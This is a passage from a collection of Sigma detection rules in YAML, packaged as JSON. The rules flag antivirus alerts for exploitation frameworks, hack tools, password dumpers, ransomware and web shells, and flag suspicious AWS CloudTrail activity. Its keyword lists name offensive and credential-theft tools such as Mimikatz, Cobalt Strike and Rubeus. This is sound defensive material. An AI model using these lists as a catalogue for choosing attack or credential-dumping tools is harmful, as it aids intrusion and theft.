    "content": "title: Antivirus Exploitation Framework Detection\nid: 238527ad-3c2c-4e4f-a1f6-92fd63adb864\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports an exploitation framework.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797\n    - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424\n    - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Signature|contains:\n            - 'Backdoor.Cobalt'\n            - 'Brutel'\n            - 'BruteR'\n            - 'CobaltStr'\n            - 'CobaltStrike'\n            - 'COBEACON'\n            - 'Cometer'\n            - 'Exploit.Script.CVE'\n            - 'IISExchgSpawnCMD'\n            - 'Metasploit'\n            - 'Meterpreter'\n            - 'MeteTool'\n            - 'Mpreter'\n            - 'MsfShell'\n            - 'PowerSploit'\n            - 'Razy'\n            - 'Rozena'\n            - 'Sbelt'\n            - 'Seatbelt'\n            - 'Sliver'\n            - 'Swrort'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_hacktool.yml",
    "content": "title: Antivirus Hacktool Detection\nid: fa0c05b6-8ad3-468d-8231-c1cbccb64fba\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2021-08-16\nmodified: 2024-11-02\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith:\n              - 'ATK/'  # Sophos\n              - 'Exploit.Script.CVE'\n              - 'HKTL'\n              - 'HTOOL'\n              - 'PWS.'\n              - 'PWSX'\n              - 'SecurityTool'\n              # - 'FRP.'\n        - Signature|contains:\n              - 'Adfind'\n              - 'Brutel'\n              - 'BruteR'\n              - 'Cobalt'\n              - 'COBEACON'\n              - 'Cometer'\n              - 'DumpCreds'\n              - 'FastReverseProxy'\n              - 'Hacktool'\n              - 'Havoc'\n              - 'Impacket'\n              - 'Keylogger'\n              - 'Koadic'\n              - 'Mimikatz'\n              - 'Nighthawk'\n              - 'PentestPowerShell'\n              - 'Potato'\n              - 'PowerSploit'\n              - 'PowerSSH'\n              - 'PshlSpy'\n              - 'PSWTool'\n              - 'PWCrack'\n              - 'PWDump'\n              - 'Rozena'\n              - 'Rusthound'\n              - 'Sbelt'\n              - 'Seatbelt'\n              - 'SecurityTool'\n              - 'SharpDump'\n              - 'SharpHound'\n              - 'Shellcode'\n              - 'Sliver'\n              - 'Snaffler'\n              - 'SOAPHound'\n              - 'Splinter'\n              - 'Swrort'\n              - 'TurtleLoader'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_password_dumper.yml",
    "content": "title: Antivirus Password Dumper Detection\nid: 78cc2dd2-7d20-4d32-93ff-057084c38b93\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a password dumper.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619\n    - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558\n    - attack.t1003.001\n    - attack.t1003.002\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith: 'PWS'\n        - Signature|contains:\n              - 'Certify'\n              - 'DCSync'\n              - 'DumpCreds'\n              - 'DumpLsass'\n              - 'DumpPert'\n              - 'HTool/WCE'\n              - 'Kekeo'\n              - 'Lazagne'\n              - 'LsassDump'\n              - 'Mimikatz'\n              - 'MultiDump'\n              - 'Nanodump'\n              - 'NativeDump'\n              - 'Outflank'\n              - 'PShlSpy'\n              - 'PSWTool'\n              - 'PWCrack'\n              - 'PWDump'\n              - 'PWS.'\n              - 'PWSX'\n              - 'pypykatz'\n              - 'Rubeus'\n              - 'SafetyKatz'\n              - 'SecurityTool'\n              - 'SharpChrome'\n              - 'SharpDPAPI'\n              - 'SharpDump'\n              - 'SharpKatz'\n              - 'SharpS.' # Sharpsploit, e.g. 530ea2ff9049f5dfdfa0a2e9c27c2e3c0685eb6cbdf85370c20a7bfae49f592d\n              - 'ShpKatz'\n              - 'TrickDump'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_ransomware.yml",
    "content": "title: Antivirus Ransomware Detection\nid: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f\nstatus: test\ndescription: |\n    Detects a highly relevant Antivirus alert that reports ransomware.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916\n    - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7\n    - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045\n    - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d\n    - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c\n    - https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2022-05-12\nmodified: 2024-11-02\ntags:\n    - attack.t1486\n    - attack.impact\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Signature|contains:\n            - 'BlackWorm'\n            - 'Chaos'\n            - 'Cobra'\n            - 'ContiCrypt'\n            - 'Crypter'\n            - 'CRYPTES'\n            - 'Cryptor'\n            - 'CylanCrypt'\n            - 'DelShad'\n            - 'Destructor'\n            - 'Filecoder'\n            - 'GandCrab'\n            - 'GrandCrab'\n            - 'Haperlock'\n            - 'Hiddentear'\n            - 'HydraCrypt'\n            - 'Krypt'\n            - 'Lockbit'\n            - 'Locker'\n            - 'Mallox'\n            - 'Phobos'\n            - 'Ransom'\n            - 'Ryuk'\n            - 'Ryzerlo'\n            - 'Stopcrypt'\n            - 'Tescrypt'\n            - 'TeslaCrypt'\n            - 'WannaCry'\n            - 'Xorist'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_relevant_files.yml",
    "content": "title: Antivirus Relevant File Paths Alerts\nid: c9a88268-0047-4824-ba6e-4d81ce0b907c\nstatus: test\ndescription: |\n    Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.resource-development\n    - attack.t1588\nlogsource:\n    category: antivirus\ndetection:\n    selection_path:\n        Filename|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '/www/'\n            # - '\\Client\\'\n            - '\\inetpub\\'\n            - '\\tsclient\\'\n            - 'apache'\n            - 'nginx'\n            - 'tomcat'\n            - 'weblogic'\n    selection_ext:\n        Filename|endswith:\n            - '.asax'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cfm'\n            - '.cgi'\n            - '.chm'\n            - '.cmd'\n            - '.dat'\n            - '.ear'\n            - '.gif'\n            - '.hta'\n            - '.jpeg'\n            - '.jpg'\n            - '.jsp'\n            - '.jspx'\n            - '.lnk'\n            - '.msc'\n            - '.php'\n            - '.pl'\n            - '.png'\n            - '.ps1'\n            - '.psm1'\n            - '.py'\n            - '.pyc'\n            - '.rb'\n            - '.scf'\n            - '.sct'\n            - '.sh'\n            - '.svg'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n            - '.war'\n            - '.wll'\n            - '.wsf'\n            - '.wsh'\n            - '.xll'\n            - '.xml'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_webshell.yml",
    "content": "title: Antivirus Web Shell Detection\nid: fdf135a2-9241-4f96-a114-bb404948f736\nstatus: test\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a web shell.\n    It is highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a large web shell repository (e.g. from GitHub) and checking the matches.\n    This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://github.com/tennc/webshell\n    - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection\n    - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection\n    - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection\n    - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection\n    - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection\n    - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection\n    - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection\n    - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith:\n              - 'ASP.'\n              - 'IIS/BackDoor'\n              - 'JAVA/Backdoor'\n              - 'JSP.'\n              - 'Perl.'\n              - 'PHP.'\n              - 'Troj/ASP'\n              - 'Troj/JSP'\n              - 'Troj/PHP'\n              - 'VBS/Uxor' # looking for 'VBS/' would also find downloaders and droppers meant for desktops\n        - Signature|contains:\n              - 'ASP_' # looking for 'VBS_' would also find downloaders and droppers meant for desktops\n              - 'ASP:'\n              - 'ASP.Agent'\n              - 'ASP/'\n              # - 'ASP/Agent'\n              - 'Aspdoor'\n              - 'ASPXSpy'\n              - 'Backdoor.ASP'\n              - 'Backdoor.Java'\n              - 'Backdoor.JSP'\n              - 'Backdoor.PHP'\n              - 'Backdoor.VBS'\n              - 'Backdoor/ASP'\n              - 'Backdoor/Java'\n              - 'Backdoor/JSP'\n              - 'Backdoor/PHP'\n              - 'Backdoor/VBS'\n              - 'C99shell'\n              - 'Chopper'\n              - 'filebrowser'\n              - 'JSP_'\n              - 'JSP:'\n              - 'JSP.Agent'\n              - 'JSP/'\n              # - 'JSP/Agent'\n              - 'Perl:'\n              - 'Perl/'\n              - 'PHP_'\n              - 'PHP:'\n              - 'PHP.Agent'\n              - 'PHP/'\n              # - 'PHP/Agent'\n              - 'PHPShell'\n              - 'PShlSpy'\n              - 'SinoChoper'\n              - 'Trojan.ASP'\n              - 'Trojan.JSP'\n              - 'Trojan.PHP'\n              - 'Trojan.VBS'\n              - 'VBS.Agent'\n              - 'VBS/Agent'\n              - 'Webshell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/database/db_anomalous_query.yml",
    "content": "title: Suspicious SQL Query\nid: d84c0ded-edd7-4123-80ed-348bb3ccc4d5\nstatus: test\ndescription: Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields\nauthor: '@juju4'\ndate: 2022-12-27\nreferences:\n    - https://github.com/sqlmapproject/sqlmap\ntags:\n    - attack.exfiltration\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1190\n    - attack.t1505.001\nlogsource:\n    category: database\n    definition: 'Requirements: Must be able to log the SQL queries'\ndetection:\n    keywords:\n        - 'drop'\n        - 'truncate'\n        - 'dump'\n        - 'select \\*'\n    condition: keywords\nfalsepositives:\n    - Inventory and monitoring activity\n    - Vulnerability scanners\n    - Legitimate applications\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml",
    "content": "title: AWS Bucket Deleted\nid: 39c9f26d-6e3b-4dbb-9c7a-4154b0281112\nstatus: experimental\ndescription: |\n    Detects the deletion of S3 buckets in AWS CloudTrail logs.\n    Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.\nreferences:\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html\n    - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html\nauthor: Ivan Saakov, Nasreddine Bencherchali\ndate: 2025-10-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_name:\n        eventName: 'DeleteBucket'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_name and 1 of selection_status_*\nfalsepositives:\n    - During maintenance operations or testing, authorized administrators may delete S3 buckets as part of routine data management or cleanup activities.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml",
    "content": "title: AWS ConsoleLogin Failed Authentication\nid: 6393e346-1977-46ef-8987-ad414a145fad\nstatus: experimental\ndescription: |\n    Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.\nreferences:\n    - https://naikordian.github.io/blog/posts/brute-force-aws-console/\n    - https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm\n    - https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json\nauthor: Ivan Saakov, Nasreddine Bencherchali\ndate: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        errorMessage: 'Failed authentication'\n    condition: selection\nfalsepositives:\n    - Legitimate failed login attempts by authorized users. Investigate the source of repeated failed login attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml",
    "content": "title: AWS Successful Console Login Without MFA\nid: 77caf516-34e5-4df9-b4db-20744fea0a60\nstatus: experimental\ndescription: |\n    Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA).\n    This alert can be used to identify potential unauthorized access attempts, as logging in without MFA can indicate compromised credentials or misconfigured security settings.\nreferences:\n    - https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html\nauthor: Thuya@Hacktilizer, Ivan Saakov\ndate: 2025-10-18\nmodified: 2025-10-21\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        additionalEventData.MFAUsed: 'NO'\n        responseElements.ConsoleLogin: 'Success'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml",
    "content": "title: AWS CloudTrail Important Change\nid: 4db60cc0-36fb-42b7-9b58-a5b53019fb74\nstatus: test\ndescription: Detects disabling, deleting and updating of a Trail\nreferences:\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: cloudtrail.amazonaws.com\n        eventName:\n            - StopLogging\n            - UpdateTrail\n            - DeleteTrail\n    condition: selection_source\nfalsepositives:\n    - Valid change in a Trail\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml",
    "content": "title: AWS GuardDuty Detector Deleted Or Updated\nid: d2656e78-c069-4571-8220-9e0ab5913f19\nstatus: experimental\ndescription: |\n    Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.\n    Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.\n    Verify with the user identity that this activity is legitimate.\nreferences:\n    - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html\n    - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html\n    - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html\n    - https://docs.datadoghq.com/security/default_rules/719-39f-9cd/\n    - https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled\n    - https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html\n    - https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml\n    - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml\n    - https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm\n    - https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/\n    - https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion\nauthor: suktech24\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_source:\n        eventSource: 'guardduty.amazonaws.com'\n    selection_action_delete:\n        eventName: 'DeleteDetector'\n    selection_action_update:\n        eventName: 'UpdateDetector'\n        requestParameters.enable: 'false'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_source and 1 of selection_action_* and 1 of selection_status_*\nfalsepositives:\n    - Legitimate detector deletion by an admin (e.g., during account decommissioning).\n    - Temporary disablement for troubleshooting (verify via change management tickets).\n    - Automated deployment tools (e.g. Terraform) managing GuardDuty state.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml",
    "content": "title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure\nid: 352a918a-34d8-4882-8470-44830c507aa3\nstatus: test\ndescription: |\n    Detects when an instance identity has taken an action that isn't inside SSM.\n    This can indicate that a compromised EC2 instance is being used as a pivot point.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html\n    - https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/\n    - https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\n    - attack.t1078.002\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userIdentity.arn|re: '.+:assumed-role/aws:.+'\n    filter_main_generic:\n        - eventSource: 'ssm.amazonaws.com'\n        - eventName: 'RegisterManagedInstance'\n        - sourceIPAddress: 'AWS Internal'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml",
    "content": "title: New Network ACL Entry Added\nid: e1f7febb-7b94-4234-b5c6-00fb8500f5dd\nstatus: test\ndescription: |\n    Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'CreateNetworkAclEntry'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml",
    "content": "title: New Network Route Added\nid: c803b2ce-c4a2-4836-beae-b112010390b1\nstatus: test\ndescription: |\n    Detects the addition of a new network route to a route table in AWS.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'CreateRoute'\n    condition: selection\nfalsepositives:\n    - New VPC Creation requiring setup of a new route table\n    - New subnets added requiring routing setup\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml",
    "content": "title: PUA - AWS TruffleHog Execution\nid: a840e606-7c8c-4684-9bc1-eb6b6155127f\nstatus: experimental\ndescription: |\n    Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.\n    It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - attack.t1003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userAgent: 'TruffleHog'\n    condition: selection\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams for credential scanning.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml",
    "content": "title: AWS EnableRegion Command Monitoring\nid: a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab\nstatus: experimental\ndescription: |\n    Detects the use of the EnableRegion command in AWS CloudTrail logs.\n    While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.\n    There may be situations where security monitoring does not cover some new AWS regions.\n    Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.\nreferences:\n    - https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html\n    - https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html\nauthor: Ivan Saakov, Sergey Zelenskiy\ndate: 2025-10-19\ntags:\n    - attack.persistence\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'EnableRegion'\n        eventSource: 'account.amazonaws.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the EnableRegion command by authorized administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml",
    "content": "title: Ingress/Egress Security Group Modification\nid: 6fb77778-040f-4015-9440-572aa9b6b580\nstatus: test\ndescription: |\n    Detects when an account makes changes to the ingress or egress rules of a security group.\n    This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'AuthorizeSecurityGroupEgress'\n            - 'AuthorizeSecurityGroupIngress'\n            - 'RevokeSecurityGroupEgress'\n            - 'RevokeSecurityGroupIngress'\n    condition: selection\nfalsepositives:\n    - New VPCs and Subnets being setup requiring a different security profile to those already defined\n    - A single port being opened for a new service that is known to be deploying\n    - Administrators closing unused ports to reduce the attack surface\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml",
    "content": "title: LoadBalancer Security Group Modification\nid: 7a4409fc-f8ca-45f6-8006-127d779eaad9\nstatus: test\ndescription: |\n    Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\n    This can indicate a misconfiguration allowing more traffic into the system than required, or that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'elasticloadbalancing.amazonaws.com'\n        eventName:\n            - 'ApplySecurityGroupsToLoadBalancer'\n            - 'SetSecurityGroups'\n    condition: selection\nfalsepositives:\n    - Repurposing of an ELB or ALB to serve a different or additional application\n    - Changes to security groups to allow for new services to be deployed\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml",
    "content": "title: RDS Database Security Group Modification\nid: 14f3f1c8-02d5-43a2-a191-91ffb52d3015\nstatus: test\ndescription: |\n    Detects changes to the security group entries for RDS databases.\n    This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'rds.amazonaws.com'\n        eventName:\n            - 'AuthorizeDBSecurityGroupIngress'\n            - 'CreateDBSecurityGroup'\n            - 'DeleteDBSecurityGroup'\n            - 'RevokeDBSecurityGroupIngress'\n    condition: selection\nfalsepositives:\n    - Creation of a new Database that needs new security group rules\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml",
    "content": "title: Potential Malicious Usage of CloudTrail System Manager\nid: 38e7f511-3f74-41d4-836e-f57dfa18eead\nstatus: test\ndescription: |\n    Detect when System Manager successfully executes commands against an instance.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml\nauthor: jamesc-grafana\ndate: 2024-07-11\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1566\n    - attack.t1566.002\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event:\n        eventName: 'SendCommand'\n        eventSource: 'ssm.amazonaws.com'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event and 1 of selection_status_*\nfalsepositives:\n    - There are legitimate uses of SSM to send commands to EC2 instances\n    - Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml",
